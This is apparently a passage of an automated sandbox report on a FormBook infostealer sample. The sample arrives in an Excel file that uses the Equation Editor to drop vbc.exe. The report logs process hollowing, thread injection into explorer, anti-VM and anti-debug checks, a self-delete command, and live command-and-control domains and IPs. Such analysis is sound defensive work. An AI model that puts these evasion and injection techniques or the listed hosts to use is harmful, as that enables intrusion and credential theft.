Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FE24 NtWriteVirtualMemory, 7_2_00B8FE24
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FFFC NtCreateProcessEx, 7_2_00B8FFFC
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B8FF34 NtQueueApcThread, 7_2_00B8FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009200C4 NtCreateFile,LdrInitializeThunk, 9_2_009200C4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009207AC NtCreateMutant,LdrInitializeThunk, 9_2_009207AC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091F9F0 NtClose,LdrInitializeThunk, 9_2_0091F9F0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091F900 NtReadFile,LdrInitializeThunk, 9_2_0091F900
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FAB8 NtQueryValueKey,LdrInitializeThunk, 9_2_0091FAB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FAD0 NtAllocateVirtualMemory,LdrInitializeThunk, 9_2_0091FAD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FAE8 NtQueryInformationProcess,LdrInitializeThunk, 9_2_0091FAE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FBB8 NtQueryInformationToken,LdrInitializeThunk, 9_2_0091FBB8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FB50 NtCreateKey,LdrInitializeThunk, 9_2_0091FB50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FB68 NtFreeVirtualMemory,LdrInitializeThunk, 9_2_0091FB68
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FC60 NtMapViewOfSection,LdrInitializeThunk, 9_2_0091FC60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FD8C NtDelayExecution,LdrInitializeThunk, 9_2_0091FD8C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FDC0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_0091FDC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FED0 NtAdjustPrivilegesToken,LdrInitializeThunk, 9_2_0091FED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FFB4 NtCreateSection,LdrInitializeThunk, 9_2_0091FFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009210D0 NtOpenProcessToken, 9_2_009210D0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00920048 NtProtectVirtualMemory, 9_2_00920048
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00920078 NtResumeThread, 9_2_00920078
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00920060 NtQuerySection, 9_2_00920060
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009201D4 NtSetValueKey, 9_2_009201D4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092010C NtOpenDirectoryObject, 9_2_0092010C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00921148 NtOpenThread, 9_2_00921148
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091F8CC NtWaitForSingleObject, 9_2_0091F8CC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00921930 NtSetContextThread, 9_2_00921930
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091F938 NtWriteFile, 9_2_0091F938
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FA20 NtQueryInformationFile, 9_2_0091FA20
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FA50 NtEnumerateValueKey, 9_2_0091FA50
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FBE8 NtQueryVirtualMemory, 9_2_0091FBE8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FC90 NtUnmapViewOfSection, 9_2_0091FC90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FC30 NtOpenProcess, 9_2_0091FC30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00920C40 NtGetContextThread, 9_2_00920C40
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FC48 NtSetInformationFile, 9_2_0091FC48
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00921D80 NtSuspendThread, 9_2_00921D80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FD5C NtEnumerateKey, 9_2_0091FD5C
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FEA0 NtReadVirtualMemory, 9_2_0091FEA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FE24 NtWriteVirtualMemory, 9_2_0091FE24
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FFFC NtCreateProcessEx, 9_2_0091FFFC
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0091FF34 NtQueueApcThread, 9_2_0091FF34
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000985B0 NtCreateFile, 9_2_000985B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098660 NtReadFile, 9_2_00098660
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000986E0 NtClose, 9_2_000986E0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098790 NtAllocateVirtualMemory, 9_2_00098790
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000985AA NtCreateFile, 9_2_000985AA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009865A NtReadFile, 9_2_0009865A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_000986DF NtClose, 9_2_000986DF
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009878D NtAllocateVirtualMemory, 9_2_0009878D
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76F90000 page execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Memory allocated: 76E90000 page execute and read and write Jump to behavior
Source: vbc[1].exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: vbc.exe.4.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: RPM.xlsx Virustotal: Detection: 32%
Source: RPM.xlsx ReversingLabs: Detection: 28%
Source: C:\Users\Public\vbc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\SysWOW64\svchost.exe
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$RPM.xlsx Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREDB8.tmp Jump to behavior
Source: classification engine Classification label: mal100.troj.expl.evad.winXLSX@9/12@7/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll Jump to behavior
Source: explorer.exe, 00000008.00000000.559068928.0000000002AE0000.00000002.00020000.sdmp Binary or memory string: .VBPud<_
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\Public\vbc.exe File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: wntdll.pdb source: vbc.exe, svchost.exe
Source: Binary string: svchost.pdb source: vbc.exe, 00000007.00000002.514238693.0000000000030000.00000040.00020000.sdmp

Data Obfuscation:

barindex
.NET source code contains potential unpacker
Source: vbc[1].exe.4.dr, PinForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: vbc.exe.4.dr, PinForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.2.vbc.exe.2a0000.0.unpack, PinForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 6.0.vbc.exe.2a0000.0.unpack, PinForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 7.2.vbc.exe.2a0000.1.unpack, PinForm.cs .Net Code: DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00418846 pushad ; retf 7_2_00418847
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B85C push eax; ret 7_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415184 pushfd ; iretd 7_2_004151A3
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041CC51 push edx; ret 7_2_0041CC52
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041547D push es; retf 7_2_00415481
Source: C:\Users\Public\vbc.exe Code function: 7_2_00415DCA push 118C2D45h; retf 7_2_00415DCF
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B7F2 push eax; ret 7_2_0041B7F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B7FB push eax; ret 7_2_0041B862
Source: C:\Users\Public\vbc.exe Code function: 7_2_0041B7A5 push eax; ret 7_2_0041B7F8
Source: C:\Users\Public\vbc.exe Code function: 7_2_00B9DFA1 push ecx; ret 7_2_00B9DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0092DFA1 push ecx; ret 9_2_0092DFB4
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00095184 pushfd ; iretd 9_2_000951A3
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009547D push es; retf 9_2_00095481
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B7A5 push eax; ret 9_2_0009B7F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B7FB push eax; ret 9_2_0009B862
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B7F2 push eax; ret 9_2_0009B7F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00098846 pushad ; retf 9_2_00098847
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009B85C push eax; ret 9_2_0009B862
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0009CC51 push edx; ret 9_2_0009CC52
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00095DCA push 118C2D45h; retf 9_2_00095DCF
Source: initial sample Static PE information: section name: .text entropy: 7.30848087754
Source: initial sample Static PE information: section name: .text entropy: 7.30848087754

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\vbc[1].exe Jump to dropped file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Drops PE files to the user directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file

Boot Survival:

barindex
Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE File created: C:\Users\Public\vbc.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\Public\vbc.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: vbc.exe PID: 3064, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 0000000000408604 second address: 000000000040860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 0000000000088604 second address: 000000000008860A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2788 Thread sleep time: -300000s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 3060 Thread sleep time: -31326s >= -30000s Jump to behavior
Source: C:\Users\Public\vbc.exe TID: 2992 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe TID: 1528 Thread sleep time: -32000s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\svchost.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088C0 rdtsc 7_2_004088C0
Contains long sleeps (>= 3 min)
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\Public\vbc.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 31326 Jump to behavior
Source: C:\Users\Public\vbc.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 00000008.00000000.502403681.000000000457A000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000008.00000000.502403681.000000000457A000.00000004.00000001.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0
Source: explorer.exe, 00000008.00000000.505779530.0000000008415000.00000004.00000001.sdmp Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&22BE343F&0&000000y7
Source: explorer.exe, 00000008.00000000.557021196.000000000029B000.00000004.00000020.sdmp Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0*N
Source: explorer.exe, 00000008.00000000.563171428.00000000045D6000.00000004.00000001.sdmp Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: vbc.exe, 00000006.00000002.470638311.0000000002281000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\Public\vbc.exe Code function: 7_2_004088C0 rdtsc 7_2_004088C0
Enables debug privileges
Source: C:\Users\Public\vbc.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\Public\vbc.exe Code function: 7_2_00BA26F8 mov eax, dword ptr fs:[00000030h] 7_2_00BA26F8
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_009326F8 mov eax, dword ptr fs:[00000030h] 9_2_009326F8
Checks if the current process is being debugged
Source: C:\Users\Public\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Users\Public\vbc.exe Code function: 7_2_00409B30 LdrLoadDll, 7_2_00409B30
Source: C:\Users\Public\vbc.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 204.141.43.204 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.floridawp.com
Source: C:\Windows\explorer.exe Domain query: www.atelifer.com
Source: C:\Windows\explorer.exe Network Connect: 203.170.129.2 80 Jump to behavior
Source: C:\Windows\explorer.exe Network Connect: 107.187.86.150 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.viscoent.online
Source: C:\Windows\explorer.exe Network Connect: 209.17.116.163 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.meta-bot.xyz
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe Section unmapped: C:\Windows\SysWOW64\svchost.exe base address: E20000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Users\Public\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Injects a PE file into a foreign processes
Source: C:\Users\Public\vbc.exe Memory written: C:\Users\Public\vbc.exe base: 400000 value starts with: 4D5A Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe Thread register set: target process: 1764 Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Thread register set: target process: 1764 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' Jump to behavior
Source: C:\Users\Public\vbc.exe Process created: C:\Users\Public\vbc.exe C:\Users\Public\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' Jump to behavior
Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000008.00000000.497000338.0000000000255000.00000004.00000020.sdmp Binary or memory string: ProgmanG
Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmp Binary or memory string: !Progman
Source: explorer.exe, 00000008.00000000.488513124.0000000000750000.00000002.00020000.sdmp Binary or memory string: Program Manager<

Language, Device and Operating System Detection:

barindex
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\Public\vbc.exe Queries volume information: C:\Users\Public\vbc.exe VolumeInformation Jump to behavior
Source: C:\Users\Public\vbc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY

Remote Access Functionality:

barindex
Yara detected FormBook
Source: Yara match File source: 7.2.vbc.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.vbc.exe.34cc4f0.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000007.00000002.514287521.00000000000F0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.506113220.0000000009549000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.679746422.0000000000080000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514392464.00000000001C0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680011174.0000000000270000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.514522564.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.471902194.0000000003289000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.680061969.00000000003B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000000.496110195.0000000009549000.00000040.00020000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
